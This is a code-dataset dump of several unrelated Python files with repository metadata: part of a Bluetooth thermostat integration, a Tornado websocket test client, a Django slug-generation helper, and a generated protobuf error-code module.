if self._current.last_talked is not None and (now - self._current.last_talked).total_seconds() < 600:
return False
return True
@property
def icon(self):
"""Return the icon to use in the frontend, if any."""
if self.is_stale():
return 'mdi:bluetooth-off'
if self._current.battery_level is None:
return 'mdi:bluetooth-off'
if self._current.battery_level == 100:
return 'mdi:battery'
if self._current.battery_level == 0:
return 'mdi:battery-alert'
if self._current.battery_level < 10:
return 'mdi:battery-outline'
if 10 <= self._current.battery_level <= 99:
return 'mdi:battery-{}0'.format(int(self._current.battery_level / 10))
return None
@property
def device_state_attributes(self):
"""Return the device specific state attributes."""
return {
ATTR_VENDOR_NAME: self._current.manufacturer,
ATTR_MODEL: self._current.model_no,
ATTR_FIRMWARE: self._current.firmware_rev,
ATTR_VERSION: self._current.software_rev,
ATTR_BATTERY: self._current.battery_level,
ATTR_TARGET: self._current.target_temp,
ATTR_WINDOW: self._current.window,
}
def update(self):
"""Update the data from the thermostat."""
get_temperatures = True
_LOGGER.info("Update called {}".format(self._mac))
self._thermostat.connect()
self._thermostat.attempt_to_get_ready()
with self._thermostat as device:
if self._current.mode_code != self._target.mode_code and self._target.manual is not None:
_LOGGER.debug("Setting mode to: {}".format(self._target.mode_value))
device.set_status(self._target.mode_value)
if self._current.target_temp != self._target.target_temp and self._target.target_temp is not None:
# TODO: Fix temperature settings. Currently not working.
_LOGGER.info("Values to set: {}".format(str(self._target.temperature_value)))
_LOGGER.debug("Setting temperature to: {}".format(self._target.target_temp))
device.set_temperatures(self._target.temperature_value)
get_temperatures = False
cur_batt = device.get_battery()
_LOGGER.debug("Current Battery Level: {}%".format(cur_batt))
cur_status = device.get_status()
cur_temps = device.get_temperatures()
if cur_temps['current_temp'] != -64.0:
self._current.temperature = cur_temps['current_temp']
self._current.target_temp = cur_temps['manual_temp']
_LOGGER.debug("Current Temperature: {}".format(cur_temps))
if self._current.model_no is None:
self._current.model_no = device.get_model_number()
self._current.firmware_rev = device.get_firmware_revision()
self._current.software_rev = device.get_software_revision()
self._current.manufacturer = device.get_manufacturer_name()
_LOGGER.debug("Current Mode: {}".format(cur_status))
_LOGGER.debug("Current Model Number: {}".format(self._current.model_no))
_LOGGER.debug("Current Firmware Revision: {}".format(self._current.firmware_rev))
_LOGGER.debug("Current Software Revision: {}".format(self._current.software_rev))
_LOGGER.debug("Current Manufacturer Name: {}".format(self._current.manufacturer))
self._thermostat.disconnect()
if self._current.target_temp is not None:
self._target.target_temp = self._current.target_temp
self._current.battery_level = cur_batt
self._current.mode_value = cur_status
self._current.last_seen = datetime.now()
self._current.last_talked = datetime.now()
| [
"github@danman.eu"
] | github@danman.eu |
d20fa8a5874b03d03598bf1c6b3baa5fe506c63c | 2515525acc90e7e59c31c7fd2215338698ad5def | /py35/try-ws-2.py | a617d5f70d6aad914454d078feb62e9e468fb433 | [] | no_license | jiagangzhang/myownsync | 3d07a90f94f233ea6efd44f04ad89037158cc535 | 09f8529952f6cfe65e6eddb3df4bb948a79cb0e8 | refs/heads/master | 2021-01-24T00:03:30.355743 | 2017-08-21T06:51:14 | 2017-08-21T06:51:14 | 68,782,531 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,926 | py | from tornado.websocket import websocket_connect
from tornado.ioloop import IOLoop, PeriodicCallback
from tornado import gen
import time
# def connectWS():
# print ('start')
# ws = websocket_connect('ws://echo.websocket.org/?encoding=text')
# # print (ws.result())
# while ws.running():
# time.sleep(1)
# print('waiting')
# print (ws.done())
# if ws.done():
# ws.write_message('hello')
# print ('sent')
# response = ws.read_message()
# print (type(response))
#
# for i in range(1):
# print ('woala')
# connectWS()
class Client(object):
def __init__(self, url, timeout):
self.url = url
self.timeout = timeout
self.ioloop = IOLoop.instance()
self.ws = None
self.connect()
# PeriodicCallback(self.keep_alive, 20000, io_loop=self.ioloop).start()
self.ioloop.start()
@gen.coroutine
def connect(self):
print ("trying to connect")
try:
self.ws = yield websocket_connect(self.url)
except Exception:
print ("connection error")
else:
print ("connected")
# self.run()
# for i in range(1):
self.sendMessage()
# print ('trying to send')
# self.ws.write_message('hello')
# print ('sent hello')
# response=yield self.ws.read_message()
# print (response)
# time.sleep(5)
# self.closeconn()
@gen.coroutine
def sendMessage(self):
try:
print ('trying to send')
self.ws.write_message('hello')
# print (self.ws)
print ('sent hello')
response=yield self.ws.read_message()
# time.sleep(1)
print (response)
except Exception:
print ('sent error')
else:
self.closeconn()
# print ('trying to send')
# self.ws.write_message('hello')
# # print (self.ws)
# print ('sent hello')
# # time.sleep(1)
# # response=yield self.ws.read_message()
# # # time.sleep(1)
# # print (response)
# while True:
# print (1)
# response = yield self.ws.read_message()
# if response is None:
# print ('none')
# break
# print (response)
@gen.coroutine
def checkResult(self,result):
pass
@gen.coroutine
def closeconn(self):
print ('closing')
self.ws.close()
print ('closed')
self.ioloop.stop()
@gen.coroutine
def run(self):
while True:
msg = yield self.ws.read_message()
if msg is None:
print ("connection closed")
self.ws = None
break
if __name__ == "__main__":
client = Client("wss://uat-lc.mymm.com:7600", 5)
| [
"jiagangzhang@mymm.com"
] | jiagangzhang@mymm.com |
e2697a7687d622b65ed30fd71240500da699214f | c79165e2600759a5266adbc6620884c8696e8dc3 | /books/utils.py | a82b038902380ce2a1b432c0d25b7f8a76bf1ac2 | [] | no_license | Elchinas25/nuggets | 12e60ec43a635cbff558363454828e2b1aa5d12c | 1e2d027a41e8df5b378067f85f244d4a8dfa222c | refs/heads/master | 2021-09-08T15:21:13.589987 | 2018-03-10T15:56:21 | 2018-03-10T15:56:21 | 124,670,366 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,125 | py | from django.utils.text import slugify
'''
random_string_generator is located here:
http://joincfe.com/blog/random-string-generator-in-python/
'''
import random
import string
DONT_USE = []
def random_string_generator(size=10, chars=string.ascii_lowercase + string.digits):
    """Return a random string of *size* characters drawn from *chars*.

    Defined here because the module referenced this helper (the header
    comment only links to it) without importing or defining it, so
    every slug collision raised NameError.
    """
    return ''.join(random.choice(chars) for _ in range(size))


def unique_slug_generator(instance, new_slug=None):
    """Return a slug that is unique for *instance*'s model.

    Slugifies ``instance.title`` (unless *new_slug* is given), then
    recurses with a random 4-character suffix appended until the slug
    is neither in DONT_USE nor already taken by another row.

    :param instance: model instance with ``title`` and ``slug`` fields
    :param new_slug: candidate slug to test instead of slugifying title
    """
    if new_slug is not None:
        slug = new_slug
    else:
        slug = slugify(instance.title)

    if slug in DONT_USE:
        # Blocked slug: retry with a random suffix.  (An unreachable
        # ``return slug`` after this recursion was removed.)
        new_slug = "{slug}-{randstr}".format(
            slug=slug,
            randstr=random_string_generator(size=4)
        )
        return unique_slug_generator(instance, new_slug=new_slug)

    Klass = instance.__class__
    qs_exists = Klass.objects.filter(slug=slug).exists()
    if qs_exists:
        # Slug already taken by another row: retry with a random suffix.
        new_slug = "{slug}-{randstr}".format(
            slug=slug,
            randstr=random_string_generator(size=4)
        )
        return unique_slug_generator(instance, new_slug=new_slug)
    return slug
"noreply@github.com"
] | Elchinas25.noreply@github.com |
d3553bdebfba88789aa4678fd67bb97396e9767d | 79fa6f3a9c0c07b2768b5c67d48cd2d3ada921c7 | /kikimr/public/api/protos/draft/persqueue_error_codes_pb2.py | 97b818110b3a6a275934558ce54cac8287566409 | [
"Apache-2.0"
] | permissive | clumpytuna/ydb-python-sdk | 8dd951a532045587fcba1d541b3fb8798c358318 | f09d8db19f62032738ed77dabb3672c3e0f86cc3 | refs/heads/master | 2023-06-09T22:38:29.747969 | 2021-06-30T08:09:14 | 2021-06-30T08:09:14 | 319,103,389 | 0 | 0 | NOASSERTION | 2020-12-06T18:32:35 | 2020-12-06T18:32:34 | null | UTF-8 | Python | false | true | 6,378 | py | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: kikimr/public/api/protos/draft/persqueue_error_codes.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf.internal import enum_type_wrapper
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='kikimr/public/api/protos/draft/persqueue_error_codes.proto',
package='NPersQueue.NErrorCode',
syntax='proto3',
serialized_pb=_b('\n:kikimr/public/api/protos/draft/persqueue_error_codes.proto\x12\x15NPersQueue.NErrorCode*\xd9\x04\n\nEErrorCode\x12\x06\n\x02OK\x10\x00\x12\x10\n\x0cINITIALIZING\x10\x01\x12\x0c\n\x08OVERLOAD\x10\x02\x12\x0f\n\x0b\x42\x41\x44_REQUEST\x10\x03\x12\x10\n\x0cWRONG_COOKIE\x10\x04\x12!\n\x1dWRITE_ERROR_PARTITION_IS_FULL\x10\x05\x12\x1c\n\x18WRITE_ERROR_DISK_IS_FULL\x10\x0f\x12\x1a\n\x16WRITE_ERROR_BAD_OFFSET\x10\x13\x12!\n\x1d\x43REATE_SESSION_ALREADY_LOCKED\x10\x06\x12\x1d\n\x19\x44\x45LETE_SESSION_NO_SESSION\x10\x07\x12\x1a\n\x16READ_ERROR_IN_PROGRESS\x10\x08\x12\x19\n\x15READ_ERROR_NO_SESSION\x10\t\x12\x10\n\x0cREAD_TIMEOUT\x10\n\x12\x1f\n\x1bREAD_ERROR_TOO_SMALL_OFFSET\x10\x0b\x12\x1d\n\x19READ_ERROR_TOO_BIG_OFFSET\x10\x0c\x12%\n!SET_OFFSET_ERROR_COMMIT_TO_FUTURE\x10\r\x12\x15\n\x11TABLET_IS_DROPPED\x10\x0e\x12\x11\n\rREAD_NOT_DONE\x10\x10\x12\x11\n\rUNKNOWN_TOPIC\x10\x11\x12\x11\n\rACCESS_DENIED\x10\x12\x12\x14\n\x10\x43LUSTER_DISABLED\x10\x14\x12\x1a\n\x16WRONG_PARTITION_NUMBER\x10\x15\x12\x12\n\x0e\x43REATE_TIMEOUT\x10\x16\x12\x10\n\x0cIDLE_TIMEOUT\x10\x17\x12\t\n\x05\x45RROR\x10\x64\x42\x1a\n\x18\x63om.yandex.ydb.persqueueb\x06proto3')
)
_EERRORCODE = _descriptor.EnumDescriptor(
name='EErrorCode',
full_name='NPersQueue.NErrorCode.EErrorCode',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='OK', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INITIALIZING', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='OVERLOAD', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BAD_REQUEST', index=3, number=3,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='WRONG_COOKIE', index=4, number=4,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='WRITE_ERROR_PARTITION_IS_FULL', index=5, number=5,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='WRITE_ERROR_DISK_IS_FULL', index=6, number=15,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='WRITE_ERROR_BAD_OFFSET', index=7, number=19,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CREATE_SESSION_ALREADY_LOCKED', index=8, number=6,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DELETE_SESSION_NO_SESSION', index=9, number=7,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='READ_ERROR_IN_PROGRESS', index=10, number=8,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='READ_ERROR_NO_SESSION', index=11, number=9,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='READ_TIMEOUT', index=12, number=10,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='READ_ERROR_TOO_SMALL_OFFSET', index=13, number=11,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='READ_ERROR_TOO_BIG_OFFSET', index=14, number=12,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SET_OFFSET_ERROR_COMMIT_TO_FUTURE', index=15, number=13,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TABLET_IS_DROPPED', index=16, number=14,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='READ_NOT_DONE', index=17, number=16,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='UNKNOWN_TOPIC', index=18, number=17,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ACCESS_DENIED', index=19, number=18,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CLUSTER_DISABLED', index=20, number=20,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='WRONG_PARTITION_NUMBER', index=21, number=21,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CREATE_TIMEOUT', index=22, number=22,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='IDLE_TIMEOUT', index=23, number=23,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ERROR', index=24, number=100,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=86,
serialized_end=687,
)
_sym_db.RegisterEnumDescriptor(_EERRORCODE)
EErrorCode = enum_type_wrapper.EnumTypeWrapper(_EERRORCODE)
OK = 0
INITIALIZING = 1
OVERLOAD = 2
BAD_REQUEST = 3
WRONG_COOKIE = 4
WRITE_ERROR_PARTITION_IS_FULL = 5
WRITE_ERROR_DISK_IS_FULL = 15
WRITE_ERROR_BAD_OFFSET = 19
CREATE_SESSION_ALREADY_LOCKED = 6
DELETE_SESSION_NO_SESSION = 7
READ_ERROR_IN_PROGRESS = 8
READ_ERROR_NO_SESSION = 9
READ_TIMEOUT = 10
READ_ERROR_TOO_SMALL_OFFSET = 11
READ_ERROR_TOO_BIG_OFFSET = 12
SET_OFFSET_ERROR_COMMIT_TO_FUTURE = 13
TABLET_IS_DROPPED = 14
READ_NOT_DONE = 16
UNKNOWN_TOPIC = 17
ACCESS_DENIED = 18
CLUSTER_DISABLED = 20
WRONG_PARTITION_NUMBER = 21
CREATE_TIMEOUT = 22
IDLE_TIMEOUT = 23
ERROR = 100
DESCRIPTOR.enum_types_by_name['EErrorCode'] = _EERRORCODE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\n\030com.yandex.ydb.persqueue'))
# @@protoc_insertion_point(module_scope)
| [
"arcadia-devtools@yandex-team.ru"
] | arcadia-devtools@yandex-team.ru |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.